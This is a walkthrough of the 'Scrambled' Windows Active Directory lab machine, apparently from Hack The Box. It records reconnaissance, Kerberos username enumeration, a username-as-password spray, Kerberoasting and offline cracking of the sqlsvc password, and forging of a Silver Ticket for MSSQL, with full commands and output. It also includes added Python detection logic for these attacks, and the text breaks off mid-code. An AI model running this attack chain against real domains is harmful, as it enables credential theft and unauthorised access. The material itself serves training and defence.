Scrambled

Windows · Medium

10.10.11.168

Reconnaissance:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.11.168 

53/tcp   open  domain        Simple DNS Plus

80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE

88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-31 02:15:05Z)

135/tcp  open  msrpc         Microsoft Windows RPC

139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn

389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-31T02:16:44+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-01-31T02:01:11
|_Not valid after:  2025-01-30T02:01:11

445/tcp  open  microsoft-ds?

464/tcp  open  kpasswd5?

593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-01-31T02:01:11
|_Not valid after:  2025-01-30T02:01:11
|_ssl-date: 2024-01-31T02:16:44+00:00; -1s from scanner time.

1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-01-31T02:16:44+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-31T02:11:07
|_Not valid after:  2054-01-31T02:11:07
| ms-sql-info: 
|   10.10.11.168:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433

3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-31T02:16:44+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-01-31T02:01:11
|_Not valid after:  2025-01-30T02:01:11

3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-01-31T02:01:11
|_Not valid after:  2025-01-30T02:01:11
|_ssl-date: 2024-01-31T02:16:44+00:00; -1s from scanner time.

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-01-31T02:16:06
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.17 seconds
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.11.168     

53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|VoIP phone|general purpose|phone
Running: Allen-Bradley embedded, Atcom embedded, Microsoft Windows 7|8|Phone|XP|2012, Palmmicro embedded, VMware Player
OS CPE: cpe:/h:allen-bradley:micrologix_1100 cpe:/h:atcom:at-320 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
OS details: Allen Bradley MicroLogix 1100 PLC, Atcom AT-320 VoIP phone, Microsoft Windows Embedded Standard 7, Microsoft Windows 8.1 Update 1, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, Palmmicro AR1688 VoIP module, VMware Player virtual NAT device
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.11.168

53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-31 02:31:49Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-31T02:35:14+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-01-31T02:01:11
|_Not valid after:  2025-01-30T02:01:11
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-31T02:35:13+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-01-31T02:01:11
|_Not valid after:  2025-01-30T02:01:11
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.10.11.168:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2024-01-31T02:35:13+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-31T02:11:07
|_Not valid after:  2054-01-31T02:11:07
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-01-31T02:01:11
|_Not valid after:  2025-01-30T02:01:11
|_ssl-date: 2024-01-31T02:35:14+00:00; -2s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-01-31T02:01:11
|_Not valid after:  2025-01-30T02:01:11
|_ssl-date: 2024-01-31T02:35:13+00:00; -2s from scanner time.
4411/tcp  open  found?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|_    ERROR_UNKNOWN_COMMAND;
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  msrpc         Microsoft Windows RPC
49725/tcp open  msrpc         Microsoft Windows RPC
62302/tcp open  msrpc         Microsoft Windows RPC

Host script results:
| smb2-time: 
|   date: 2024-01-31T02:34:39
|_  start_date: N/A
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1237.74 seconds
┌──(kali💀kali)-[~]
└─$ nmap --script vuln 10.10.11.168

53/tcp   open  domain
80/tcp   open  http
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.11.168
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.11.168:80/newuser.html
|     Form id: 
|_    Form action: #
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
1433/tcp open  ms-sql-s
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Nmap done: 1 IP address (1 host up) scanned in 1498.85 seconds

These look like the typical ports I would expect on a Windows DC, plus 80 (HTTP), 5985 (WinRM), 1433 (MSSQL), and something unknown on 4411. LDAP shows the full hostname as DC1.scrm.local. I’ll add both DC1.scrm.local and scrm.local to my /etc/hosts file.

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts  
10.10.11.168	scrm.local
10.10.11.168 	dc1.scrm.local 

EM: Website - TCP 80

HTTP: 3
80/tcp    open  http          Microsoft IIS httpd 10.0
4411/tcp  open  found?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
http://10.10.11.168/index.html
http://10.10.11.168/support.html

Web servers
- IIS 10.0
Operating systems
- Windows Server
JavaScript libraries
- jQuery 3.4.1

view-source:http://10.10.11.168/index.html
┌──(kali💀kali)-[~]
└─$ whatweb -a3 http://10.10.11.168/ -v 
WhatWeb report for http://10.10.11.168/
Status    : 200 OK
Title     : Scramble Corp Intranet
IP        : 10.10.11.168
Country   : RESERVED, ZZ

Summary   : HTML5, HTTPServer[Microsoft-IIS/10.0], JQuery, Microsoft-IIS[10.0], Script

Detected Plugins:
[ HTML5 ]
        HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        String       : Microsoft-IIS/10.0 (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse 
        HTML documents, handle events, perform animations, and add 
        AJAX. 

        Website     : http://jquery.com/

[ Microsoft-IIS ]
        Microsoft Internet Information Services (IIS) for Windows 
        Server is a flexible, secure and easy-to-manage Web server 
        for hosting anything on the Web. From media streaming to 
        web application hosting, IIS's scalable and open 
        architecture is ready to handle the most demanding tasks. 

        Version      : 10.0
        Website     : http://www.iis.net/

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 


HTTP Headers:
        HTTP/1.1 200 OK
        Content-Type: text/html
        Last-Modified: Thu, 04 Nov 2021 18:13:14 GMT
        Accept-Ranges: bytes
        ETag: "3aed29a2a7d1d71:0"
        Server: Microsoft-IIS/10.0
        Date: Wed, 31 Jan 2024 03:23:18 GMT
        Connection: close
        Content-Length: 2313
┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.11.168 

+ Server: Microsoft-IIS/10.0
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ 8074 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2024-01-30 23:12:12 (GMT-5) (2925 seconds)
┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.11.168 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt 

/images               (Status: 301) [Size: 150] [--> http://10.10.11.168/images/]
/Images               (Status: 301) [Size: 150] [--> http://10.10.11.168/Images/]
/assets               (Status: 301) [Size: 150] [--> http://10.10.11.168/assets/]
/IMAGES               (Status: 301) [Size: 150] [--> http://10.10.11.168/IMAGES/]
/Assets               (Status: 301) [Size: 150] [--> http://10.10.11.168/Assets/]

NTLM authentication is disabled:

News And Alerts 04/09/2021: Due to the security breach last month we have now disabled all NTLM authentication on our network. This may cause problems for some of the programs you use so please be patient while we work to resolve any issues

403 - Forbidden: Access is denied. http://10.10.11.168/images/ http://10.10.11.168/assets/

http://10.10.11.168/supportrequest.html Send your email to support@scramblecorp.com and we will respond as soon as possible

A screenshot leaks a username, ksimpson:

When submitting a support request via email please include your network information. You can collect this by doing the following:

  1. Type (cmd.exe) into the start menu

  2. In the new window that appears type (ipconfig > %USERPROFILE%\Desktop\ip.txt) and press Enter

  3. There will now be a file named ip on your desktop. Add this file as an attachment to the email

http://10.10.11.168/newuser.html http://10.10.11.168/newuser.html?demo-category=1#

/salesorders.html has details on the “Sales Orders App”, which confirms the hostname / domain name from nmap, and also gives an indication of what TCP 4411 is used for:

http://10.10.11.168/salesorders.html

/passwords.html says: Our self service password reset system will be up and running soon but in the meantime please call the IT support line and we will reset your password. If no one is available please leave a message stating your username and we will reset your password to be the same as the username.

http://10.10.11.168/passwords.html

EM: KERBEROS

User Enumeration via Kerberos: One way to enumerate users through Kerberos is with Kerbrute, a tool that uses Impacket’s modules to brute-force Kerberos usernames. Because Kerberos is an authentication protocol, the KDC’s reply distinguishes the cases: if the username exists but the password is wrong, it answers “KDC_ERR_PREAUTH_FAILED”; if the username does not exist, it answers “KDC_ERR_C_PRINCIPAL_UNKNOWN”. This makes the brute-force easier, since valid usernames can be found without knowing any passwords. Also, add “scrm.local” and “dc1.scrm.local” to the hosts file.

/kerberos_enum_userlists /A-ZSurnames.txt

┌──(kali💀kali)-[~/go/bin/kerbrute/dist]
└─$ ./kerbrute_linux_amd64 userenum -d scrm.local --dc scrm.local /home/kali/Desktop/A-ZSurnames.txt

2024/01/31 00:09:16 >  [+] VALID USERNAME:       ASMITH@scrm.local
2024/01/31 00:12:24 >  [+] VALID USERNAME:       JHALL@scrm.local
2024/01/31 00:13:00 >  [+] VALID USERNAME:       KSIMPSON@scrm.local
2024/01/31 00:13:19 >  [+] VALID USERNAME:       KHICKS@scrm.local
2024/01/31 00:16:28 >  [+] VALID USERNAME:       SJENKINS@scrm.local

Password Spraying: I tried to check whether any other users have the same password as their username, using the “--user-as-pass” flag in Kerbrute. Note that the tool uses the username as the password verbatim, without converting it to lower case. Only “ksimpson” has the same username and password.

┌──(kali💀kali)-[~/go/bin/kerbrute/dist]
└─$ nano users.txt
asmith
jhall
ksimpson
khicks
sjenkins
┌──(kali💀kali)-[~/go/bin/kerbrute/dist]
└─$ ./kerbrute_linux_amd64 passwordspray -d scrm.local --dc scrm.local --user-as-pass /home/kali/Desktop/users.txt

2024/01/31 00:56:52 >  Using KDC(s):
2024/01/31 00:56:52 >   scrm.local:88

2024/01/31 00:56:53 >  [+] VALID LOGIN:  ksimpson@scrm.local:ksimpson
2024/01/31 00:56:53 >  Done! Tested 5 logins (1 successes) in 1.663 seconds
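As an added example (not part of the original writeup), here is the defender’s view of the two Kerbrute runs above: a Python triage of Windows Security event 4768 (Kerberos AS-REQ) records that flags user enumeration (many KDC_ERR_C_PRINCIPAL_UNKNOWN, 0x6, answers for distinct names from one source) and a user-as-pass spray (a run of KDC_ERR_PREAUTH_FAILED, 0x18, across accounts, with any success in the same burst being the account whose password matched). The event rows are constructed to mirror the runs above; the field names, burst window and thresholds are my assumptions.

```python
"""Flag Kerberos user enumeration and password spraying in Windows event 4768."""
from collections import defaultdict
from datetime import datetime, timedelta

# Result codes logged in event 4768 (AS-REQ), as the KDC answers each attempt.
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # the username does not exist
KDC_ERR_PREAUTH_FAILED = "0x18"       # the user exists, wrong password
KDC_SUCCESS = "0x0"                   # TGT issued

# Constructed sample, not DC1's real log: a surname-list enumeration burst and a
# user-as-pass spray from one source, plus a user mistyping a password once.
# Valid names typically leave no 4768 failure, so the volume of 0x6 is the tell.
SAMPLE_4768 = [
    # (TimeCreated, IpAddress, TargetUserName, Status)
    ("2024-01-31 00:09:10", "10.10.16.6", "ABBOTT", "0x6"),
    ("2024-01-31 00:09:11", "10.10.16.6", "ADAMS", "0x6"),
    ("2024-01-31 00:09:12", "10.10.16.6", "ALLEN", "0x6"),
    ("2024-01-31 00:09:13", "10.10.16.6", "ANDERSON", "0x6"),
    ("2024-01-31 00:09:14", "10.10.16.6", "ARMSTRONG", "0x6"),
    ("2024-01-31 00:09:15", "10.10.16.6", "ARNOLD", "0x6"),
    ("2024-01-31 00:56:53", "10.10.16.6", "asmith", "0x18"),
    ("2024-01-31 00:56:53", "10.10.16.6", "jhall", "0x18"),
    ("2024-01-31 00:56:53", "10.10.16.6", "ksimpson", "0x0"),
    ("2024-01-31 00:56:53", "10.10.16.6", "khicks", "0x18"),
    ("2024-01-31 00:56:53", "10.10.16.6", "sjenkins", "0x18"),
    ("2024-01-31 01:05:00", "10.10.11.50", "jhall", "0x0"),
    ("2024-01-31 01:05:30", "10.10.11.50", "jhall", "0x18"),
]


def parse(rows):
    """Normalise rows into dicts; usernames are compared case-insensitively."""
    return [{"time": datetime.strptime(t, "%Y-%m-%d %H:%M:%S"), "ip": ip,
             "user": user.lower(), "status": status} for t, ip, user, status in rows]


def bursts_by_source(events, window):
    """Yield (ip, burst) where consecutive events from one ip are <= window apart."""
    per_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        per_ip[e["ip"]].append(e)
    for ip, evs in per_ip.items():
        burst = [evs[0]]
        for e in evs[1:]:
            if e["time"] - burst[-1]["time"] <= window:
                burst.append(e)
            else:
                yield ip, burst
                burst = [e]
        yield ip, burst


def detect(events, window=timedelta(minutes=5), enum_threshold=5, spray_threshold=3):
    """Return findings as tuples; the thresholds are assumptions to tune per domain."""
    findings = []
    for ip, burst in bursts_by_source(events, window):
        unknown = {e["user"] for e in burst if e["status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN}
        failed = {e["user"] for e in burst if e["status"] == KDC_ERR_PREAUTH_FAILED}
        ok = {e["user"] for e in burst if e["status"] == KDC_SUCCESS}
        # Many distinct non-existent names from one source: wordlist enumeration.
        if len(unknown) >= enum_threshold:
            findings.append(("user_enumeration", ip, len(unknown)))
        # One source, one guess each across several accounts: a spray; any
        # success inside the same burst is the account whose password matched.
        if len(failed) >= spray_threshold:
            findings.append(("password_spray", ip, len(failed | ok), sorted(ok)))
    return findings


if __name__ == "__main__":
    for finding in detect(parse(SAMPLE_4768)):
        print(finding)
```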

Obtaining TGT: Once the credentials were verified to be valid, I used them to request a TGT (Ticket Granting Ticket) with Impacket’s “getTGT” script, which saves the TGT as a ccache (credential cache) file: ksimpson@scrm.local:ksimpson

┌──(kali💀kali)-[/opt/impacket-0.9.19/examples]
└─$ sudo impacket-getTGT scrm.local/ksimpson:ksimpson 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Saving ticket in ksimpson.ccache

Now that we have a TGT, we can request a ST/TGS (Service Ticket / Ticket Granting Service ticket) from the KDC (Key Distribution Centre), provided we can find a user account with an SPN (Service Principal Name). A valid TGT and an existing SPN are all that is required to request a ST from the KDC. When the SPN is registered to a domain user, the ST is encrypted with a key derived from that account’s password (with RC4, the NT hash itself). So once the ST is obtained, we can crack it offline on our machine. This attack (Kerberoasting) works if the account is using a weak password.

Obtaining SPN and ST/TGS: Using Impacket’s “GetUserSPNs” script, I was able to request the ticket. Note: at the time, GetUserSPNs.py had an unfixed issue when using Kerberos credentials from a ccache file. To work around it you need to edit GetUserSPNs.py, replacing target = self.getMachineName() with target = self.__kdcHost. Moreover, you need to pass the DC’s hostname (dc1.scrm.local) rather than an IP in the -dc-ip parameter to make it work.

The “KRB5CCNAME” environment variable must be set to the ccache file name. The “-k” flag tells the script to use that cache (the Kerberos ticket), and “-no-pass” tells it that we will pass the ticket instead of a password:

vi /usr/share/doc/python3-impacket/examples/GetUserSPNs.py

    if self.__doKerberos:
        #target = self.getMachineName()   # old line 260 code that we're no longer running
        target = self.__kdcHost

Using the ticket, we can obtain the Service Principal Name of the account, which is an MSSQL service.

export KRB5CCNAME=ksimpson.ccache

┌──(kali💀kali)-[~/Desktop]
└─$ sudo KRB5CCNAME=ksimpson.ccache GetUserSPNs.py -request -dc-ip dc1.scrm.local scrm.local/ksimpson -k -no-pass 
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[-] exceptions must be old-style classes or derived from BaseException, not str
┌──(kali💀kali)-[~/Desktop]
└─$ KRB5CCNAME=ksimpson.ccache GetUserSPNs.py -dc-ip dc1.scrm.local scrm.local/ksimpson -request -k -no-pass
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation 
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 12:32:02.351452  2022-06-30 01:27:08.621499             
MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-03 12:32:02.351452  2022-06-30 01:27:08.621499             

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$62b20419c8bc0e2a7d02052df5753b96$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

Cracking TGS using john/HashCat: Then, using john, we can crack the password, which will come in handy later.

┌──(kali💀kali)-[~/Desktop]
└─$ john -w=/usr/share/wordlists/rockyou.txt  ksimpson_hash.txt

In less than a minute on my system it cracks to “Pegasus60”.

FOOTHOLD: Shell as MiscSvc

139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?

TOOLS: Because NTLM authentication is disabled, I won’t be able to use many of the standard tools here, and I won’t be able to access any service by IP address if it requires authentication.

smbclient won’t work, and I wasn’t able to get crackmapexec to work either.

Since a username was found and port 445 was open during the initial nmap scan, you can use impacket’s smbclient with the -k option to use kerberos. This will help validate if you have a valid username and password pair. Since public shares can be browsed with the valid credential you can pull down the Network Security Changes.pdf file to view its contents.

Enumerating SMB shares using TGT: I used the TGT to access the SMB shares and found a file named “Network Security Changes.pdf”.

┌──(kali💀kali)-[~/Desktop]
└─$ smbclient.py -k scrm.local/ksimpson:ksimpson@dc1.scrm.local -dc-ip dc1.scrm.local
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Type help for list of commands
# 

┌──(kali💀kali)-[~/Desktop]
└─$ KRB5CCNAME=ksimpson.ccache smbclient.py -k -no-pass dc1.scrm.local
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Type help for list of commands
# 

Most shares ksimpson can’t access:

# use ADMIN$
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# use C$
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# use HR
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# use IT
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# use Sales
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

There’s a single document in Public:

# use Public
# ls
drw-rw-rw-          0  Thu Nov  4 18:23:19 2021 .
drw-rw-rw-          0  Thu Nov  4 18:23:19 2021 ..
-rw-rw-rw-     630106  Fri Nov  5 13:45:07 2021 Network Security Changes.pdf

# get Network Security Changes.pdf

Network Security Changes.pdf: The document is a letter from the IT staff to all employees: This mentions again that NTLM is disabled because of an NTLM relay attack, and now everything is done via Kerberos. It also mentions that the SQL database has had access removed from the HR department.

Kerberoast:

Collect Challenge/Response: GetUserSPNs.py (another Impacket script) is typically how to fetch a potentially crackable challenge/response from a Windows server. However, when Scrambled was released, it broke:

Some Googling shows that the author of this box raised an issue on the Impacket GitHub for this very error, titled “GetUserSpns.py fails when using -k option and NTLM auth is disabled”. The suggested fix in that issue is to edit one line, which I’ll do on line 260:

        if self.__doKerberos:
            #target = self.getMachineName()
            target = self.__kdcHost

After making that change, it dumps a challenge/response (or “hash”, though not really a hash) for the MSSQLSvc user:

GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-ip dc1.scrm.local -request -k

The issue has since been fixed; with up-to-date Impacket, I just need to use -dc-host instead of -dc-ip:

MSSQL Access: Silver Ticket

These creds don’t directly allow access to anything new for me. But because this account runs the SQL service, I can use the password to perform a Silver Ticket attack. The overview linked there from adsecurity.org is really good. A Silver Ticket is a forged TGS (service) ticket, which is used directly between the client and the service without going to the DC. Because a service ticket is encrypted and signed with the service account’s own key, anyone holding that key can forge one; a Silver Ticket is therefore limited to authenticating to that one service.

To create a Silver Ticket, an attacker needs:

  1. The NTLM hash of the service account’s password;

  2. The SID of the domain;

  3. The service principal name (SPN) associated with the account.

  1. NTLM Hash: To get the NTLM hash of the password “Pegasus60”, I’ll use the commands from this post:

┌──(kali💀kali)-[~/Desktop]
└─$ iconv -f ASCII -t UTF-16LE <(printf "Pegasus60") | openssl dgst -md4                
MD4(stdin)= b999a16500b87d17ec7f2e2a68778f05

CrackStation (https://crackstation.net/) and https://codebeautify.org/ntlm-hash-generator both give the same value:
B999A16500B87D17EC7F2E2A68778F05
  2. Domain SID: To get the domain SID, I’ll need to connect back to LDAP, but authenticated. It took a good deal of troubleshooting and Googling to get this working (thanks to TheCyberGeek for some tips on this one). If I try to connect as ksimpson, I get an error about SSL/TLS being required; getPac.py authenticating as sqlsvc returns the SID directly:

┌──(kali💀kali)-[~/Desktop]
└─$ getPac.py -targetUser sqlsvc scrm.local/sqlsvc:Pegasus60 | grep "Domain SID"
Domain SID: S-1-5-21-2743207045-1827831105-2542523200
  3. SPN: I already acquired the SPN with GetUserSPNs.py above: MSSQLSvc/dc1.scrm.local:1433.

Generate Ticket: ticketer.py (or impacket-ticketer) will generate a ticket using the information gathered:

┌──(kali💀kali)-[~/Desktop]
└─$ ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -dc-ip dc1.scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 administrator
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in administrator.ccache

The output file is administrator.ccache, which is a kerberos ticket as administrator that only the MSSQL service will trust.
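As an added example (not part of the original writeup), a Python check over Security events collected from DC1, which on this box hosts both the KDC and the MSSQL service: a 4769 TGS request with RC4 (etype 0x17) for a non-machine service account is the Kerberoast pattern that produced the $krb5tgs$23$ blob above, and a Kerberos network logon (4624) for a user to whom the KDC never issued a service ticket is the footprint of the forged ticket, since a Silver Ticket is built from the service key and never passes through the DC’s TGS exchange. The sample events are constructed; correlating on user name only and the 10-hour window are my assumptions (4624 does not carry the SPN), so this is a heuristic, not proof.

```python
"""Kerberoast and Silver Ticket indicators from DC1's Security log (constructed data)."""
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType in 4769; crackable offline from the NT hash
AES256 = "0x12"

# Constructed sample events, not DC1's real log. 4769 = TGS request seen by the
# KDC, 4624 = logon on DC1 (where MSSQL runs). Keys follow the Windows XML fields.
SAMPLE = [
    {"id": 4769, "time": "2024-01-31 01:10:00", "ip": "10.10.11.50", "user": "jhall",
     "service": "DC1$", "etype": AES256},
    # ksimpson's TGT used to request the sqlsvc ticket with RC4: Kerberoast
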